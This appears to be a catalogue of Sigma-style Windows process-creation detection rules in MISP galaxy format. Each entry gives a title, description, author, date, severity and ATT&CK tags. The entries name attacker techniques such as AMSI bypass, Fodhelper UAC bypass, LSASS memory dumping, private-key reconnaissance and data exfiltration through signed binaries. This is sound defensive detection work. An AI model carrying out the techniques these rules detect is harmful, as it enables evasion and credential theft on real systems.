filename proc_creation_win_hktl_dinjector.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Hacktool Execution - Imphash

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

Internal MISP references

UUID 24e3e58a-646b-4b50-adef-02ef935b9fc8 which can be used as unique global reference for Hacktool Execution - Imphash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/04
falsepositive ['Legitimate use of one of these tools']
filename proc_creation_win_hktl_execution_via_imphashes.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1588.002', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher

Detects obfuscated use of environment variables to execute PowerShell

Internal MISP references

UUID 27aec9c9-dbb0-4939-8422-1742242471d0 which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_var.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Child Processes Of SndVol.exe

Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)

Internal MISP references

UUID ba42babc-0666-4393-a4f7-ceaf5a69191e which can be used as unique global reference for Uncommon Child Processes Of SndVol.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unknown']
filename proc_creation_win_sndvol_susp_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Electron Application Child Processes

Detects suspicious child processes of Electron apps (Teams, Discord, Slack, etc.). This could be a potential sign of ".asar" file tampering (see the reference section for more information) or of binary execution proxying through specific CLI arguments (see related rule)

Internal MISP references

UUID f26eb764-fd89-464b-85e2-dc4a8e6e77b8 which can be used as unique global reference for Suspicious Electron Application Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/21
falsepositive ['Legitimate child processes can occur in cases of debugging']
filename proc_creation_win_susp_electron_app_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state

Internal MISP references

UUID 236d8e89-ed95-4789-a982-36f4643738ba which can be used as unique global reference for Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/14
falsepositive ['Unknown']
filename proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Powershell Search Order Hijacking - Task

Detects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags to hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen being used in Colibri Loader

Internal MISP references

UUID b66474aa-bd92-4333-a16c-298155b120df which can be used as unique global reference for Potential Persistence Via Powershell Search Order Hijacking - Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/04/08
falsepositive ['Unknown']
filename proc_creation_win_schtasks_powershell_persistence.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - PCHunter Execution

Detects suspicious use of PCHunter, a tool similar to Process Hacker used to view and manipulate processes, kernel options and other low-level system components

Internal MISP references

UUID fca949cc-79ca-446e-8064-01aa7e52ece5 which can be used as unique global reference for HackTool - PCHunter Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali
creation_date 2022/10/10
falsepositive ['Unlikely']
filename proc_creation_win_hktl_pchunter.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1082', 'attack.t1057', 'attack.t1012', 'attack.t1083', 'attack.t1007']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher

Detects obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 6c96fc76-0eb1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_stdin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Local Accounts Discovery

Detects local account and system owner/user discovery using operating system utilities

Internal MISP references

UUID 502b42de-4306-40b4-9596-6f590c81f073 which can be used as unique global reference for Local Accounts Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate administrator or user enumerates local users for legitimate reason']
filename proc_creation_win_susp_local_system_owner_account_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'attack.t1087.001']
Related clusters

To see the related clusters, click here.

File Download Via Windows Defender MpCmpRun.EXE

Detects the use of Windows Defender MpCmdRun.EXE to download files

Internal MISP references

UUID 46123129-1024-423e-9fae-43af4a0fa9a5 which can be used as unique global reference for File Download Via Windows Defender MpCmpRun.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matthew Matchen
creation_date 2020/09/04
falsepositive ['Unknown']
filename proc_creation_win_mpcmdrun_download_arbitrary_file.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Arbitrary Shell Command Execution Via Settingcontent-Ms

The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

Internal MISP references

UUID 24de4f3b-804c-4165-b442-5a06a2302c7e which can be used as unique global reference for Arbitrary Shell Command Execution Via Settingcontent-Ms in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/03/13
falsepositive ['Unknown']
filename proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1204', 'attack.t1566.001', 'attack.execution', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Potential PowerShell Execution Via DLL

Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.

Internal MISP references

UUID 6812a10b-60ea-420c-832f-dfcc33b646ba which can be used as unique global reference for Potential PowerShell Execution Via DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/08/25
falsepositive ['Unknown']
filename proc_creation_win_susp_powershell_execution_via_dll.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

New Process Created Via Wmic.EXE

Detects new process creation using WMIC via the "process call create" flag

Internal MISP references

UUID 526be59f-a573-4eea-b5f7-f0973207634d which can be used as unique global reference for New Process Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_wmic_process_creation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']
Related clusters

To see the related clusters, click here.

Suspicious IIS URL GlobalRules Rewrite Via AppCmd

Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.

Internal MISP references

UUID 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 which can be used as unique global reference for Suspicious IIS URL GlobalRules Rewrite Via AppCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of appcmd to add new URL rewrite rules']
filename proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential AMSI Bypass Via .NET Reflection

Detects a request to "amsiInitFailed" that can be used to disable AMSI scanning

Internal MISP references

UUID 30edb182-aa75-42c0-b0a9-e998bb29067c which can be used as unique global reference for Potential AMSI Bypass Via .NET Reflection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @Kostastsale
creation_date 2018/08/17
falsepositive ['Unlikely']
filename proc_creation_win_powershell_amsi_init_failed_bypass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Reg Add Suspicious Paths

Detects use of the reg.exe utility to add or modify keys or subkeys under suspicious paths

Internal MISP references

UUID b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 which can be used as unique global reference for Reg Add Suspicious Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Rare legitimate add to registry via cli (to these locations)']
filename proc_creation_win_reg_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Malicious PE Execution by Microsoft Visual Studio Debugger

The Microsoft Visual Studio Just-In-Time Debugger "vsjitdebugger.exe" has an option to launch a specified executable and attach a debugger to it. This option may be used by adversaries to execute malicious code via a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.

Internal MISP references

UUID 15c7904e-6ad1-4a45-9b46-5fb25df37fd2 which can be used as unique global reference for Malicious PE Execution by Microsoft Visual Studio Debugger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
creation_date 2020/10/14
falsepositive ['The process spawned by vsjitdebugger.exe is uncommon.']
filename proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Schtasks From Suspicious Folders

Detects scheduled task creations that have suspicious action command and folder combinations

Internal MISP references

UUID 8a8379b8-780b-4dbf-b1e9-31c8d112fefb which can be used as unique global reference for Schtasks From Suspicious Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/15
falsepositive ['Unknown']
filename proc_creation_win_schtasks_folder_combos.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Delete All Scheduled Tasks

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

Internal MISP references

UUID 220457c1-1c9f-4c2e-afe6-9598926222c1 which can be used as unique global reference for Delete All Scheduled Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_delete_all.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Hidden Powershell in Link File Pattern

Detects events that appear when a user clicks on a link file with a PowerShell command in it

Internal MISP references

UUID 30e92f50-bb5a-4884-98b5-d20aa80f3d7a which can be used as unique global reference for Hidden Powershell in Link File Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/06
falsepositive ['Legitimate commands in .lnk files']
filename proc_creation_win_susp_embed_exe_lnk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Node Process Executions

Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud

Internal MISP references

UUID df1f26d3-bea7-4700-9ea2-ad3e990cf90e which can be used as unique global reference for Node Process Executions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unknown']
filename proc_creation_win_node_adobe_creative_cloud_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential CobaltStrike Process Patterns

Detects potential process patterns related to Cobalt Strike beacon activity

Internal MISP references

UUID f35c5d71-b489-4e22-a115-f003df287317 which can be used as unique global reference for Potential CobaltStrike Process Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/27
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_process_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

DriverQuery.EXE Execution

Detects usage of the "driverquery" utility, which can be used to perform reconnaissance on installed drivers

Internal MISP references

UUID a20def93-0709-4eae-9bd2-31206e21e6b2 which can be used as unique global reference for DriverQuery.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/19
falsepositive ['Legitimate use by third party tools in order to investigate installed drivers']
filename proc_creation_win_driverquery_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

Process Memory Dump via RdrLeakDiag.EXE

Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory

Internal MISP references

UUID edadb1e5-5919-4e4c-8462-a9e643b02c4b which can be used as unique global reference for Process Memory Dump via RdrLeakDiag.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/09/24
falsepositive ['Unknown']
filename proc_creation_win_rdrleakdiag_process_dumping.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Download From Direct IP Via Bitsadmin

Detects usage of bitsadmin to download a file using a URL that contains an IP address

Internal MISP references

UUID 99c840f2-2012-46fd-9141-c761987550ef which can be used as unique global reference for Suspicious Download From Direct IP Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

PsExec Service Child Process Execution as LOCAL SYSTEM

Detects suspicious launch of the PSEXESVC service on this system and a child process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system with the highest privileges rather than only the privileges of the logged-in user account (e.g. the administrator account)

Internal MISP references

UUID 7c0dcd3d-acf8-4f71-9570-f448b0034f94 which can be used as unique global reference for PsExec Service Child Process Execution as LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension']
filename proc_creation_win_sysinternals_psexesvc_as_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Mshta.EXE Execution Patterns

Detects suspicious mshta process execution patterns

Internal MISP references

UUID e32f92d1-523e-49c3-9374-bdb13b46a3ba which can be used as unique global reference for Suspicious Mshta.EXE Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/17
falsepositive ['Unknown']
filename proc_creation_win_mshta_susp_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1106']
Related clusters

To see the related clusters, click here.

Suspicious File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extension of the file is suspicious

Internal MISP references

UUID ea0cdc3e-2239-4f26-a947-4e8f8224e464 which can be used as unique global reference for Suspicious File Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_encode_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']

Dynamic .NET Compilation Via Csc.EXE

Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

Internal MISP references

UUID dcaa3f04-70c3-427a-80b4-b870d73c94c4 which can be used as unique global reference for Dynamic .NET Compilation Via Csc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2019/08/24
falsepositive ['Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897', 'Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962', 'Ansible']
filename proc_creation_win_csc_susp_dynamic_compilation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.004']

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Detects the execution of arbitrary PowerShell code using SyncAppvPublishingServer.vbs.

Internal MISP references

UUID 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1 which can be used as unique global reference for SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/16
falsepositive ['Unknown']
filename proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1216']

Execution via stordiag.exe

Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe.

Internal MISP references

UUID 961e0abb-1b1e-4c84-a453-aafe56ad0d34 which can be used as unique global reference for Execution via stordiag.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer (@austinsonger)
creation_date 2021/10/21
falsepositive ['Legitimate usage of stordiag.exe.']
filename proc_creation_win_stordiag_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

PUA - NirCmd Execution As LOCAL SYSTEM

Detects the use of NirCmd tool for command execution as SYSTEM user

Internal MISP references

UUID d9047477-0359-48c9-b8c7-792cedcdc9c4 which can be used as unique global reference for PUA - NirCmd Execution As LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nircmd_as_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']

Application Removed Via Wmic.EXE

Detects the uninstallation of an application via wmic.

Internal MISP references

UUID b53317a0-8acf-4fd1-8de8-a5401e776b96 which can be used as unique global reference for Application Removed Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/28
falsepositive ['Unknown']
filename proc_creation_win_wmic_uninstall_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']

Private Keys Reconnaissance Via CommandLine Tools

Detects adversaries searching for private key certificate files on compromised systems in order to find insecurely stored credentials.

Internal MISP references

UUID 213d6a77-3d55-4ce8-ba74-fcfef741974e which can be used as unique global reference for Private Keys Reconnaissance Via CommandLine Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/20
falsepositive ['Unknown']
filename proc_creation_win_susp_private_keys_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']

Changing Existing Service ImagePath Value Via Reg.EXE

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in Registry permissions to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services.

Internal MISP references

UUID 9b0b7ac3-6223-47aa-a3fd-e8f211e637db which can be used as unique global reference for Changing Existing Service ImagePath Value Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename proc_creation_win_reg_service_imagepath_change.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1574.011']

Potentially Suspicious Child Process Of ClickOnce Application

Detects potentially suspicious child processes of a ClickOnce deployment application

Internal MISP references

UUID 67bc0e75-c0a9-4cfc-8754-84a505b63c04 which can be used as unique global reference for Potentially Suspicious Child Process Of ClickOnce Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/12
falsepositive ['Unknown']
filename proc_creation_win_dfsvc_suspicious_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion']

Suspicious ConfigSecurityPolicy Execution

Detects file upload, credential theft or data exfiltration using ConfigSecurityPolicy.exe, a binary that is part of Windows Defender.

Internal MISP references

UUID 1f0f6176-6482-4027-b151-00071af39d7e which can be used as unique global reference for Suspicious ConfigSecurityPolicy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_configsecuritypolicy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567']

Audit Policy Tampering Via NT Resource Kit Auditpol

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Internal MISP references

UUID c6c56ada-612b-42d1-9a29-adad3c5c2c1e which can be used as unique global reference for Audit Policy Tampering Via NT Resource Kit Auditpol in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ["The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure"]
filename proc_creation_win_auditpol_nt_resource_kit_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']

Bypass UAC via Fodhelper.exe

Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

Internal MISP references

UUID 7f741dcf-fc22-4759-87b4-9ae8376676a2 which can be used as unique global reference for Bypass UAC via Fodhelper.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate use of fodhelper.exe utility by legitimate user']
filename proc_creation_win_uac_bypass_fodhelper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']

Application Whitelisting Bypass via Dnx.exe

Detects the execution of C# code located in the consoleapp folder via dnx.exe.

Internal MISP references

UUID 81ebd28b-9607-4478-bf06-974ed9d53ed7 which can be used as unique global reference for Application Whitelisting Bypass via Dnx.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2019/10/26
falsepositive ['Legitimate use of dnx.exe by legitimate user']
filename proc_creation_win_lolbin_dnx.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1027.004']

Windows Kernel Debugger Execution

Detects execution of the Windows Kernel Debugger "kd.exe".

Internal MISP references

UUID 27ee9438-90dc-4bef-904b-d3ef927f5e7e which can be used as unique global reference for Windows Kernel Debugger Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required']
filename proc_creation_win_kd_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Potential Dosfuscation Activity

Detects possible payload obfuscation via the commandline

Internal MISP references

UUID a77c1610-fc73-4019-8e29-0f51efc04a51 which can be used as unique global reference for Potential Dosfuscation Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/15
falsepositive ['Unknown']
filename proc_creation_win_cmd_dosfuscation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Suspicious Calculator Usage

Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.

Internal MISP references

UUID 737e618a-a410-49b5-bec3-9e55ff7fbc15 which can be used as unique global reference for Suspicious Calculator Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/02/09
falsepositive ['Unknown']
filename proc_creation_win_calc_uncommon_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']

Potential ReflectDebugger Content Execution Via WerFault.EXE

Detects execution of "WerFault.exe" with the "-pr" command-line flag, which is used to run files stored in the ReflectDebugger key. This key could be used to store the path to malware in order to masquerade the execution flow.

Internal MISP references

UUID fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd which can be used as unique global reference for Potential ReflectDebugger Content Execution Via WerFault.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/30
falsepositive ['Unknown']
filename proc_creation_win_werfault_reflect_debugger_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1036']

Potential Encoded PowerShell Patterns In CommandLine

Detects specific combinations of encoding methods in PowerShell via the commandline

Internal MISP references

UUID cdf05894-89e7-4ead-b2b0-0a5f97a90f2f which can be used as unique global reference for Potential Encoded PowerShell Patterns In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020/10/11
falsepositive ['Unknown']
filename proc_creation_win_powershell_encoding_patterns.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Dropping Of Password Filter DLL

Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS

Internal MISP references

UUID b7966f4a-b333-455b-8370-8ca53c229762 which can be used as unique global reference for Dropping Of Password Filter DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/10/29
falsepositive ['Unknown']
filename proc_creation_win_reg_credential_access_via_password_filter.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1556.002']

System Network Connections Discovery Via Net.EXE

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID 1c67a717-32ba-409b-a45d-0fb704a73a81 which can be used as unique global reference for System Network Connections Discovery Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename proc_creation_win_net_use_network_connections_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1049']

Potential ShellDispatch.DLL Functionality Abuse

Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"

Internal MISP references

UUID 82343930-652f-43f5-ab70-2ee9fdd6d5e9 which can be used as unique global reference for Potential ShellDispatch.DLL Functionality Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_shelldispatch_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
